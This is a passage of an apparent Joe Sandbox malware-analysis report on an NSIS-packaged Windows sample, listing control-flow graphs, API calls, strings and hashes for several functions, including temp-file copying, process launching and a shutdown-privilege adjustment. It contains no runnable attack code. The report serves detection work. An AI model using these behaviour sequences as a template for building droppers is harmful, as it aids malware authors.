6ff6177c-6ff61786 call 6ff61a01 61->63 66 6ff614c4-6ff614d8 PeekNamedPipe 62->66 63->60 68 6ff617c3-6ff617fc call 6ff61c8c CloseHandle * 6 64->68 69 6ff617ab-6ff617c0 wsprintfW 64->69 65->64 70 6ff614de-6ff6151e GetTickCount ReadFile 66->70 71 6ff6170a-6ff6170d 66->71 84 6ff61802-6ff61805 68->84 85 6ff617fe 68->85 69->68 76 6ff61520-6ff61522 70->76 77 6ff61538-6ff6153b 70->77 73 6ff6175f 71->73 74 6ff6170f-6ff61714 71->74 73->53 80 6ff61716-6ff61723 GetTickCount 74->80 81 6ff6174a-6ff61752 Sleep 74->81 76->77 83 6ff61524-6ff61535 IsTextUnicode 76->83 78 6ff61757-6ff6175a 77->78 79 6ff61541-6ff61544 77->79 78->62 79->62 86 6ff6154a-6ff61555 79->86 80->81 87 6ff61725-6ff61745 TerminateProcess lstrcpyW 80->87 81->62 83->77 88 6ff61807-6ff6180a DeleteFileW 84->88 89 6ff61810-6ff6181e GlobalFree 84->89 85->84 90 6ff61557-6ff61567 86->90 87->62 88->89 89->20 91 6ff61820-6ff61823 GlobalFree 89->91 90->66 92 6ff6156d-6ff61570 90->92 91->20 93 6ff61592-6ff61595 92->93 94 6ff61572-6ff61576 92->94 96 6ff61597-6ff615a5 IsDBCSLeadByteEx 93->96 97 6ff615cc 93->97 94->66 95 6ff6157c-6ff6157f 94->95 98 6ff61581-6ff6158b 95->98 99 6ff6158d-6ff61590 95->99 100 6ff615b6-6ff615ca MultiByteToWideChar 96->100 101 6ff615a7-6ff615b0 96->101 102 6ff615d0-6ff615d6 97->102 98->102 99->90 103 6ff615d7-6ff615dc 100->103 101->66 101->100 102->103 104 6ff615de-6ff615e1 103->104 105 6ff6160a-6ff6160f 103->105 106 6ff615e3-6ff615e6 104->106 107 6ff6163b-6ff6163d 104->107 108 6ff61616-6ff6161b 105->108 109 6ff61611-6ff61614 105->109 110 6ff615ec-6ff61608 lstrcpyW 106->110 111 6ff6166d-6ff61670 106->111 107->111 114 6ff6163f-6ff61643 107->114 108->107 113 6ff6161d-6ff61620 108->113 109->108 112 6ff6165d-6ff61668 109->112 110->112 115 6ff61672-6ff6168e GlobalReAlloc 111->115 116 6ff616a9-6ff616b3 111->116 112->90 113->107 117 6ff61622-6ff61639 call 6ff61a01 113->117 114->112 118 6ff61645-6ff61658 114->118 119 6ff61690-6ff616a4 115->119 120 6ff616ec-6ff61705 lstrcpyW 115->120 121 6ff616b5-6ff616c6 call 6ff6182a 116->121 122 6ff616d3-6ff616ea call 6ff61948 116->122 117->112 118->118 124 6ff6165a 118->124 119->86 120->62 128 6ff616cb-6ff616ce 121->128 122->128 124->112 128->62
                                                              APIs
                                                                • Part of subcall function 6FF61987: GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,6FF610E0), ref: 6FF61990
                                                                • Part of subcall function 6FF61987: GetModuleHandleA.KERNEL32(KERNEL32,?,?,00000000,?,?,?,6FF610E0), ref: 6FF6199E
                                                                • Part of subcall function 6FF61987: GetProcAddress.KERNEL32(00000000,?), ref: 6FF619BD
                                                              • GetModuleFileNameW.KERNEL32(?,00000104), ref: 6FF610FA
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 6FF61112
                                                              • CharPrevW.USER32(?,?), ref: 6FF6113D
                                                              • GlobalFree.KERNEL32(00000000), ref: 6FF61164
                                                              • GetTempFileNameW.KERNEL32(?,6FF63088,00000000,?), ref: 6FF61182
                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 6FF61198
                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 6FF611B0
                                                              • CreateFileMappingW.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 6FF611BF
                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 6FF611CD
                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 6FF611F7
                                                              • CloseHandle.KERNEL32(00000000), ref: 6FF611FE
                                                              • CloseHandle.KERNEL32(00000000), ref: 6FF61205
                                                              • lstrcatW.KERNEL32(?,6FF63084), ref: 6FF61214
                                                              • lstrlenW.KERNEL32(?), ref: 6FF6121B
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 6FF6123C
                                                              • FindWindowExW.USER32(00010432,00000000,#32770,00000000), ref: 6FF61274
                                                              • FindWindowExW.USER32(00000000), ref: 6FF61277
                                                              • lstrcmpiW.KERNEL32(00000000,/OEM,00000000), ref: 6FF612B0
                                                              • lstrcmpiW.KERNEL32(00000000,/MBCS), ref: 6FF612C5
                                                              • DeleteFileW.KERNEL32(?,error), ref: 6FF612FA
                                                              • GetVersion.KERNEL32 ref: 6FF61340
                                                              • GlobalAlloc.KERNEL32(00000040,00000FFE), ref: 6FF613B0
                                                              • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 6FF613DE
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 6FF613EF
                                                              • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 6FF61411
                                                              • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 6FF61424
                                                              • GetStartupInfoW.KERNEL32(00000044), ref: 6FF61431
                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,?), ref: 6FF6147A
                                                              • lstrcpyW.KERNEL32(?,error), ref: 6FF61490
                                                              • GetTickCount.KERNEL32 ref: 6FF6149B
                                                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 6FF614AB
                                                              • GetExitCodeProcess.KERNELBASE(?,?), ref: 6FF614BE
                                                              • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 6FF614CF
                                                              • GetTickCount.KERNEL32 ref: 6FF614DE
                                                              • ReadFile.KERNEL32(?,00000000,00000400,?,00000000), ref: 6FF61503
                                                              • IsTextUnicode.ADVAPI32(6FF630B8,?,00000000), ref: 6FF61529
                                                              • IsDBCSLeadByteEx.KERNEL32(?,?), ref: 6FF6159D
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,6FF630B8,00000001,?,00000002), ref: 6FF615C4
                                                              • lstrcpyW.KERNEL32(?, ), ref: 6FF615F4
                                                              • GlobalReAlloc.KERNEL32(00000002,00000402,00000042), ref: 6FF61686
                                                                • Part of subcall function 6FF61948: CharNextExA.USER32(?,0000000A,00000000,6FF630B8,?,6FF616EA,?,00000002,00000002,0000000A), ref: 6FF61974
                                                              • lstrcpyW.KERNEL32(?,error), ref: 6FF616F8
                                                              • GetTickCount.KERNEL32 ref: 6FF61716
                                                              • TerminateProcess.KERNEL32(?,000000FF), ref: 6FF6172D
                                                              • lstrcpyW.KERNEL32(?,timeout), ref: 6FF6173F
                                                              • Sleep.KERNELBASE(00000064), ref: 6FF6174C
                                                              • lstrcpyW.KERNEL32(?,error), ref: 6FF6179C
                                                              • wsprintfW.USER32 ref: 6FF617BA
                                                              • CloseHandle.KERNEL32(?,?), ref: 6FF617D8
                                                              • CloseHandle.KERNEL32(?), ref: 6FF617E0
                                                              • CloseHandle.KERNEL32(?), ref: 6FF617E5
                                                              • CloseHandle.KERNEL32(?), ref: 6FF617EA
                                                              • CloseHandle.KERNEL32(?), ref: 6FF617EF
                                                              • CloseHandle.KERNEL32(?), ref: 6FF617F4
                                                              • DeleteFileW.KERNEL32(?), ref: 6FF6180A
                                                              • GlobalFree.KERNEL32(?), ref: 6FF61819
                                                              • GlobalFree.KERNEL32(00000002), ref: 6FF61823
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1450170496.000000006FF61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF60000, based on PE: true
                                                              • Associated: 00000000.00000002.1450157086.000000006FF60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.1450186265.000000006FF62000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.1450199247.000000006FF63000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.1450217071.000000006FF64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff60000_file.jbxd
                                                              Similarity
                                                              • API ID: File$Handle$Close$Global$Createlstrcpy$AllocProcess$CharCountFreePipeTick$ByteDeleteDescriptorFindModuleNameSecurityViewWindowlstrcmpi$AddressCodeCopyCurrentDaclExitInfoInitializeLeadMappingMultiNamedNextObjectPeekPrevProcReadSingleSleepStartupTempTerminateTextUnicodeUnmapVersionWaitWidelstrcatlstrlenwsprintf
                                                              • String ID: $#32770$/MBCS$/OEM$/TIMEOUT=$@1Wu7Wu$D$SysListView32$error$timeout
                                                              • API String ID: 351676774-900835945
                                                              • Opcode ID: 3cf5bbbf10cc0e90380e5fc429ef39bf523758108e03f28c95f28b85638cb955
                                                              • Instruction ID: de3f3d862b9619a1d2b2a12a4e7ec63bf6b39e690ea8fa9c92fa87bf30552f3d
                                                              • Opcode Fuzzy Hash: 3cf5bbbf10cc0e90380e5fc429ef39bf523758108e03f28c95f28b85638cb955
                                                              • Instruction Fuzzy Hash: 01323472C10219EFDF109FA4C984AEEBBB9FF09754F10416AE515E7260DB31AA94CF60
                                                              Function 00403532 Relevance: 81.0, APIs: 32, Strings: 14, Instructions: 464stringfilecomCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 130 403532-403584 SetErrorMode GetVersionExW 131 403586-4035b6 GetVersionExW 130->131 132 4035be-4035c3 130->132 131->132 133 4035c5 132->133 134 4035cb-40360d 132->134 133->134 135 403620 134->135 136 40360f-403617 call 40694b 134->136 138 403625-403639 call 4068db lstrlenA 135->138 136->135 141 403619 136->141 143 40363b-403657 call 40694b * 3 138->143 141->135 150 403668-4036cc #17 OleInitialize SHGetFileInfoW call 406557 GetCommandLineW call 406557 143->150 151 403659-40365f 143->151 158 4036d5-4036e9 call 405e53 CharNextW 150->158 159 4036ce-4036d0 150->159 151->150 155 403661 151->155 155->150 162 4037e4-4037ea 158->162 159->158 163 4037f0 162->163 164 4036ee-4036f4 162->164 167 403804-40381e GetTempPathW call 403501 163->167 165 4036f6-4036fb 164->165 166 4036fd-403704 164->166 165->165 165->166 168 403706-40370b 166->168 169 40370c-403710 166->169 177 403820-40383e GetWindowsDirectoryW lstrcatW call 403501 167->177 178 403876-403890 DeleteFileW call 403082 167->178 168->169 171 4037d1-4037e0 call 405e53 169->171 172 403716-40371c 169->172 171->162 189 4037e2-4037e3 171->189 175 403736-40376f 172->175 176 40371e-403725 172->176 183 403771-403776 175->183 184 40378c-4037c6 175->184 181 403727-40372a 176->181 182 40372c 176->182 177->178 192 403840-403870 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403501 177->192 194 403896-40389c 178->194 195 403a7d-403a8d call 403b4f OleUninitialize 178->195 181->175 181->182 182->175 183->184 191 403778-403780 183->191 187 4037c8-4037cc 184->187 188 4037ce-4037d0 184->188 187->188 193 4037f2-4037ff call 406557 187->193 188->171 189->162 196 403782-403785 191->196 197 403787 191->197 192->178 192->195 193->167 200 4038a2-4038ad call 405e53 194->200 201 403935-40393c call 403c29 194->201 207 403ab3-403ab9 195->207 208 403a8f-403a9f call 405bb7 ExitProcess 195->208 196->184 196->197 197->184 212 4038fb-403905 200->212 213 4038af-4038e4 200->213 210 403941-403945 201->210 214 403b37-403b3f 207->214 215 403abb-403ad1 GetCurrentProcess OpenProcessToken 207->215 210->195 216 403907-403915 call 405f2e 212->216 217 40394a-403970 call 405b22 lstrlenW call 406557 212->217 221 4038e6-4038ea 213->221 218 403b41 214->218 219 403b45-403b49 ExitProcess 214->219 222 403ad3-403b01 LookupPrivilegeValueW AdjustTokenPrivileges 215->222 223 403b07-403b15 call 40694b 215->223 216->195 235 40391b-403931 call 406557 * 2 216->235 240 403981-403999 217->240 241 403972-40397c call 406557 217->241 218->219 226 4038f3-4038f7 221->226 227 4038ec-4038f1 221->227 222->223 233 403b23-403b2e ExitWindowsEx 223->233 234 403b17-403b21 223->234 226->221 232 4038f9 226->232 227->226 227->232 232->212 233->214 238 403b30-403b32 call 40140b 233->238 234->233 234->238 235->201 238->214 246 40399e-4039a2 240->246 241->240 248 4039a7-4039d1 wsprintfW call 406594 246->248 252 4039d3-4039d8 call 405aab 248->252 253 4039da call 405b05 248->253 257 4039df-4039e1 252->257 253->257 258 4039e3-4039ed GetFileAttributesW 257->258 259 403a1d-403a3c SetCurrentDirectoryW call 406317 CopyFileW 257->259 261 403a0e-403a19 258->261 262 4039ef-4039f8 DeleteFileW 258->262 267 403a7b 259->267 268 403a3e-403a5f call 406317 call 406594 call 405b3a 259->268 261->246 264 403a1b 261->264 262->261 263 4039fa-403a0c call 405c63 262->263 263->248 263->261 264->195 267->195 276 403a61-403a6b 268->276 277 403aa5-403ab1 CloseHandle 268->277 276->267 278 403a6d-403a75 call 4068b4 276->278 277->267 278->248 278->267
                                                              APIs
                                                              • SetErrorMode.KERNELBASE ref: 00403555
                                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
                                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
                                                              • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
                                                              • OleInitialize.OLE32(00000000), ref: 00403670
                                                              • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
                                                              • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
                                                              • CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000008,0000000A,0000000C), ref: 004036DD
                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403832
                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040384E
                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
                                                              • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0043F000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954
                                                                • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                              • wsprintfW.USER32 ref: 004039B1
                                                              • GetFileAttributesW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\), ref: 004039E4
                                                              • DeleteFileW.KERNEL32(00437800), ref: 004039F0
                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E
                                                                • Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321
                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\file.exe,00437800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34
                                                                • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                                                • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                                                • Part of subcall function 004068B4: FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                • Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB
                                                              • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
                                                              • ExitProcess.KERNEL32 ref: 00403A9F
                                                              • CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AA6
                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
                                                              • ExitProcess.KERNEL32 ref: 00403B49
                                                                • Part of subcall function 00405B05: CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                              • String ID: 1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\acneform\Tjenestepligterne$C:\Users\user\Desktop$C:\Users\user\Desktop\file.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                              • API String ID: 1813718867-2364880001
                                                              • Opcode ID: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
                                                              • Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
                                                              • Opcode Fuzzy Hash: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
                                                              • Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E
                                                              Function 0040571B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 281 40571b-405736 282 4058c5-4058cc 281->282 283 40573c-405803 GetDlgItem * 3 call 40450b call 404e64 GetClientRect GetSystemMetrics SendMessageW * 2 281->283 285 4058f6-405903 282->285 286 4058ce-4058f0 GetDlgItem CreateThread CloseHandle 282->286 304 405821-405824 283->304 305 405805-40581f SendMessageW * 2 283->305 288 405921-40592b 285->288 289 405905-40590b 285->289 286->285 293 405981-405985 288->293 294 40592d-405933 288->294 291 405946-40594f call 40453d 289->291 292 40590d-40591c ShowWindow * 2 call 40450b 289->292 301 405954-405958 291->301 292->288 293->291 297 405987-40598d 293->297 299 405935-405941 call 4044af 294->299 300 40595b-40596b ShowWindow 294->300 297->291 306 40598f-4059a2 SendMessageW 297->306 299->291 302 40597b-40597c call 4044af 300->302 303 40596d-405976 call 4055dc 300->303 302->293 303->302 310 405834-40584b call 4044d6 304->310 311 405826-405832 SendMessageW 304->311 305->304 312 405aa4-405aa6 306->312 313 4059a8-4059d3 CreatePopupMenu call 406594 AppendMenuW 306->313 320 405881-4058a2 GetDlgItem SendMessageW 310->320 321 40584d-405861 ShowWindow 310->321 311->310 312->301 318 4059d5-4059e5 GetWindowRect 313->318 319 4059e8-4059fd TrackPopupMenu 313->319 318->319 319->312 323 405a03-405a1a 319->323 320->312 322 4058a8-4058c0 SendMessageW * 2 320->322 324 405870 321->324 325 405863-40586e ShowWindow 321->325 322->312 326 405a1f-405a3a SendMessageW 323->326 327 405876-40587c call 40450b 324->327 325->327 326->326 328 405a3c-405a5f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 326->328 327->320 330 405a61-405a88 SendMessageW 328->330 330->330 331 405a8a-405a9e GlobalUnlock SetClipboardData CloseClipboard 330->331 331->312
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000403), ref: 00405779
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405788
                                                              • GetClientRect.USER32(?,?), ref: 004057C5
                                                              • GetSystemMetrics.USER32(00000002), ref: 004057CC
                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
                                                              • ShowWindow.USER32(?,00000008), ref: 00405868
                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405889
                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405797
                                                                • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004058DB
                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
                                                              • CloseHandle.KERNELBASE(00000000), ref: 004058F0
                                                              • ShowWindow.USER32(00000000), ref: 00405914
                                                              • ShowWindow.USER32(?,00000008), ref: 00405919
                                                              • ShowWindow.USER32(00000008), ref: 00405963
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
                                                              • CreatePopupMenu.USER32 ref: 004059A8
                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
                                                              • GetWindowRect.USER32(?,?), ref: 004059DC
                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
                                                              • OpenClipboard.USER32(00000000), ref: 00405A3D
                                                              • EmptyClipboard.USER32 ref: 00405A43
                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
                                                              • GlobalLock.KERNEL32(00000000), ref: 00405A59
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
                                                              • CloseClipboard.USER32 ref: 00405A9E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                              • String ID: {
                                                              • API String ID: 590372296-366298937
                                                              • Opcode ID: 6ac74cf2b0cd8326ebbb69d62323ae371d5bd3f712404c75dedbcee8fb33a3cc
                                                              • Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
                                                              • Opcode Fuzzy Hash: 6ac74cf2b0cd8326ebbb69d62323ae371d5bd3f712404c75dedbcee8fb33a3cc
                                                              • Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58
                                                              Function 00405C63 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 639 405c63-405c89 call 405f2e 642 405ca2-405ca9 639->642 643 405c8b-405c9d DeleteFileW 639->643 645 405cab-405cad 642->645 646 405cbc-405ccc call 406557 642->646 644 405e1f-405e23 643->644 647 405cb3-405cb6 645->647 648 405dcd-405dd2 645->648 652 405cdb-405cdc call 405e72 646->652 653 405cce-405cd9 lstrcatW 646->653 647->646 647->648 648->644 651 405dd4-405dd7 648->651 654 405de1-405de9 call 4068b4 651->654 655 405dd9-405ddf 651->655 656 405ce1-405ce5 652->656 653->656 654->644 662 405deb-405dff call 405e26 call 405c1b 654->662 655->644 659 405cf1-405cf7 lstrcatW 656->659 660 405ce7-405cef 656->660 663 405cfc-405d18 lstrlenW FindFirstFileW 659->663 660->659 660->663 679 405e01-405e04 662->679 680 405e17-405e1a call 4055dc 662->680 665 405dc2-405dc6 663->665 666 405d1e-405d26 663->666 665->648 670 405dc8 665->670 667 405d46-405d5a call 406557 666->667 668 405d28-405d30 666->668 681 405d71-405d7c call 405c1b 667->681 682 405d5c-405d64 667->682 671 405d32-405d3a 668->671 672 405da5-405db5 FindNextFileW 668->672 670->648 671->667 675 405d3c-405d44 671->675 672->666 678 405dbb-405dbc FindClose 672->678 675->667 675->672 678->665 679->655 683 405e06-405e15 call 4055dc call 406317 679->683 680->644 692 405d9d-405da0 call 4055dc 681->692 693 405d7e-405d81 681->693 682->672 684 405d66-405d6f call 405c63 682->684 683->644 684->672 692->672 696 405d83-405d93 call 4055dc call 406317 693->696 697 405d95-405d9b 693->697 696->672 697->672
                                                              APIs
                                                              • DeleteFileW.KERNELBASE(?,?,75573420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405C8C
                                                              • lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,75573420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405CD4
